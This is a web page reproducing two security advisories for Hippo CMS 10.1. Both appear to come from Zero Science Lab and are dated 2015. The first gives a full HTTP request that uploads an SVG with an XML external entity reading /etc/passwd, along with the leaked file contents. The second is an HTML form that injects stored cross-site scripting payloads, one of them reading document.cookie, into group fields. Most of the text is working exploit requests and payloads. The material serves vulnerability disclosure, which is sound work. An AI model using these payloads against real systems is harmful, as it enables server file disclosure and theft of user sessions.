扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 |
Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability Vendor: Hippo B.V. Product web page: http://www.onehippo.org Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition) Summary: Hippo CMS is an open source Java CMS. We built it so you can easily integrate it into your existing architecture. Desc: XXE (XML External Entity) processing through upload of SVG images in the CMS, and through XML import in the CMS Console application. Tested on: Linux 2.6.32-5-xen-amd64 Java/1.8.0_66 Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5301 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php Vendor: http://www.onehippo.org/security-issues-list/security-12.html http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html 04.12.2015 --- [Request]: POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1 Host: 10.0.2.17 User-Agent: ZSL_Web_Scanner/2.8 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg Content-Length: 2101 Content-Type: multipart/form-data; boundary=---------------------------20443294602274 Cookie: [OMMITED] Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -----------------------------20443294602274 Content-Disposition: form-data; name="id1a0_hf_0" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item :view:1:item:value:widget" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item :view:1:item:view:1:item:view:1:item:value:widget" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item :view:1:item:view:2:item:view:1:item:value:widget" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left :view:1:item:view:1:item:value:widget" asd -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left :view:2:item:view:1:item:value:widget" hhh -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left :view:3:item:view:1:item:panel:editor" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right :view:2:item:view:1:item:value:widget" hhh -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right :view:3:item:view:1:item:value:widget" hhhh -----------------------------20443294602274 Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="yes"?><!DOCTYPE zsl [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ] ><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999 /xlink" version="1.1">&xxe;</svg> -----------------------------20443294602274-- [Response]: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www .w3.org/1999/xlink" height="7" version="1.1" viewBox="0 0 500.0 40.0" width="98"> root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync *** *** *** *** </svg> ############################################################################### <!-- Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability Vendor: Hippo B.V. Product web page: http://www.onehippo.org Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition) Summary: Hippo CMS is an open source Java CMS. We built it so you can easily integrate it into your existing architecture. Desc: Hippo CMS suffers from a stored XSS vulnerability. Input passed thru the POST parameters 'groupname' and 'description' is not sanitized allowing the attacker to execute HTML code into user's browser session on the affected site. Tested on: Linux 2.6.32-5-xen-amd64 Java/1.8.0_66 Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5300 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php Vendor: http://www.onehippo.org/security-issues-list/security-12.html http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html 04.12.2015 --> <html> <body> <form action="https://10.0.2.17/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-6-panel-panel-form-create~button" method="POST"> <input type="hidden" name="id26c_hf_0" value="" /> <input type="hidden" name="groupname" value="<img src=ko onerror=confirm(document.cookie)>" /> <input type="hidden" name="description" value="<img src=ko onerror=confirm(2)>" /> <input type="hidden" name="create-button" value="1" /> <input type="submit" value="Inject code" /> </form> </body> </html> |
体验盒子
